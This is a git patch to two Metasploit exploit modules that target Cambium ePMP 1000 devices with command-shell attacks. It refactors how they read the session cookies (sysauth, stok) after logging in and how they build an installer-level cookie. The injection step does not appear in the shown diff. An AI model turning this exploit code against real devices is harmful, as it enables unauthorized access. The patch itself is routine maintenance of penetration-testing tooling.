From 7b386ea2c8a4e2de94f5aa99f996800bdb925fe6 Mon Sep 17 00:00:00 2001 From: Jon Hart Date: Tue, 19 Dec 2017 06:58:23 -0800 Subject: [PATCH] Fix msftidy warnings wrt Set-Cookie --- .../linux/http/epmp1000_get_chart_cmd_shell.rb | 11 ++++++----- .../exploits/linux/http/epmp1000_ping_cmd_shell.rb | 14 +++++++------- 2 files changed, 13 insertions(+), 12 deletions(-) diff --git a/modules/exploits/linux/http/epmp1000_get_chart_cmd_shell.rb b/modules/exploits/linux/http/epmp1000_get_chart_cmd_shell.rb index 99563f011f..9520f489dc 100644 --- a/modules/exploits/linux/http/epmp1000_get_chart_cmd_shell.rb +++ b/modules/exploits/linux/http/epmp1000_get_chart_cmd_shell.rb @@ -127,15 +127,15 @@ class MetasploitModule < Msf::Exploit::Remote } ) + cookies = res.get_cookies good_response = ( res && res.code == 200 && - res.headers.include?('Set-Cookie') && - res.headers['Set-Cookie'].include?('sysauth') + cookies.include?('sysauth') ) if good_response - sysauth_value = res.headers['Set-Cookie'].match(/((.*)[$ ])/) + sysauth_value = cookies.match(/((.*)[$ ])/) cookie1 = "#{sysauth_value}" prevsessid = res.body.match(/((?:[a-z][a-z]*[0-9]+[a-z0-9]*))/) @@ -158,10 +158,11 @@ class MetasploitModule < Msf::Exploit::Remote } ) + cookies = res.get_cookies good_response = ( res && res.code == 200 && - res.headers.include?('Set-Cookie') && + !cookies.blank? && !res.body.include?('auth_failed') && !res.body.include?('Maximum number of users reached.') ) @@ -170,7 +171,7 @@ class MetasploitModule < Msf::Exploit::Remote print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}") # get the cookie now - sysauth_value_2 = res.headers['Set-Cookie'].match(/((.*)[$ ])/) + sysauth_value_2 = cookies.match(/((.*)[$ ])/) stok_value_2_dirty = res.body.match(/"stok": "(.*?)"/) stok_value_2 = "#{stok_value_2_dirty}".split('"')[3] final_cookie = "#{sysauth_value_2}" + 'usernameType_80=admin; stok_80=' + "#{stok_value_2}" diff --git a/modules/exploits/linux/http/epmp1000_ping_cmd_shell.rb b/modules/exploits/linux/http/epmp1000_ping_cmd_shell.rb index 1764f1c8fb..403bb75972 100644 --- a/modules/exploits/linux/http/epmp1000_ping_cmd_shell.rb +++ b/modules/exploits/linux/http/epmp1000_ping_cmd_shell.rb @@ -127,15 +127,15 @@ class MetasploitModule < Msf::Exploit::Remote } ) + cookies = res.get_cookies good_response = ( res && res.code == 200 && - res.headers.include?('Set-Cookie') && - res.headers['Set-Cookie'].include?('sysauth') + cookies.include?('sysauth') ) if good_response - sysauth_value = res.headers['Set-Cookie'].match(/((.*)[$ ])/) + sysauth_value = cookies.match(/((.*)[$ ])/) cookie1 = "#{sysauth_value}; " + "globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22#{user}%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D" @@ -157,11 +157,11 @@ class MetasploitModule < Msf::Exploit::Remote } ) + cookies = res.get_cookies good_response = ( res && res.code == 200 && - res.headers.include?('Set-Cookie') && - res.headers['Set-Cookie'].include?('stok=') && + cookies.include?('stok=') && !res.body.include?('Maximum number of users reached.') ) @@ -169,9 +169,9 @@ class MetasploitModule < Msf::Exploit::Remote print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}") # get the cookie now - get_stok = res.headers['Set-Cookie'].match(/stok=(.*)/) + get_stok = cookies.match(/stok=(.*)/) stok_value = get_stok[1] - sysauth_value = res.headers['Set-Cookie'].match(/((.*)[$ ])/) + sysauth_value = cookies.match(/((.*)[$ ])/) final_cookie = "#{sysauth_value}; " + "globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22#{user}%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D; userType=Installer; usernameType=installer; stok=" + "#{stok_value}" # create config_uri